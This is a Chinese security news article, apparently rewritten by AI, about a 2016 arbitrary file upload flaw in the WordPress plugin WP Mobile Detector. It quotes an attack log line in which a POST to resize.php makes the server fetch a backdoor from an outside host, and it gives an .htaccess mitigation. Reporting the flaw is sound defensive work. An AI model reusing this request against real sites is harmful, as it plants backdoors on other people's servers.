根据Sucuri的安全团队的最新报告,WP移动探测器这一流行插件中存在的漏洞,导致越来越多的WordPress网站遭到黑客攻击。更令人担忧的是,目前尚无可用的修复补丁来解决这一问题。
Sucuri的专家指出,黑客主要通过利用WP移动探测器插件中的漏洞,植入与色情内容有关的垃圾邮件脚本。
该插件在漏洞被披露后,已从官方WordPress插件库中被删除。
在一篇博客中,Sucuri的研究团队表示:“我们的调查显示,这些受影响的WordPress网站都安装了WP移动探测器插件,该插件存在自5月31日以来披露的任意文件上传0-day漏洞。目前,该插件已从WordPress插件库中移除,且仍未有可用的补丁。”此外,他们提到,尽管漏洞在5月31日被公开,但攻击行为自5月27日起便已开始。”
据统计,该插件在超过10,000个活跃网站中被安装,然而大多数网站仍面临风险,容易受到网络攻击。
此漏洞导致插件的输入验证失败,使得攻击者可以将恶意的PHP代码上传至服务器。
Sucuri的报告指出:“此漏洞极易被利用,攻击者只需向resize.php或timthumb.php发送请求,即可在插件目录中植入后门程序的URL。”
以下是我们检测到的一例攻击负载:
188.73.152.166 – – [31/May/2016:23:54:43 -0400] “POST /wp-content/plugins/wp-mobile-detector/resize.php
Payload:src=hxxp://copia[.]ru/mig/tmp/css.php”
专家们强调,由于尚无修复补丁,最有效的措施就是卸载存在漏洞的WP移动探测器插件。
他们强烈建议用户删除该插件。如果确实需要使用,可以考虑在wp移动目录或缓存目录中禁用PHP执行,具体方法是在.htaccess文件中添加如下代码:
<Files *.php>
deny from all
</Files>
本文标题:数万网站遭黑客攻击:WordPress插件漏洞引发安全危机
网址:https://www.2090ai.com/2025/09/13/plugins/62102.html
本站所有文章由wordpress极光ai post插件通过chatgpt写作修改后发布,并不代表本站的观点;如果无意间侵犯了你的权益,请联系我们进行删除处理。
如需转载,请务必注明文章来源和链接,谢谢您的支持与鼓励!
